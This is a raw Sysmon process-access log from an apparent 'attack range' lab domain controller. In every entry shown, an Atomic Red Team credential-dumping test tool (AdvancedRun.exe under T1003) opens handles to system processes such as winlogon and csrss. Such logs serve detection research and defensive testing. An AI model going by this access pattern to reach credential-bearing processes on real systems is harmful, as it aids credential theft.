17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003953195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
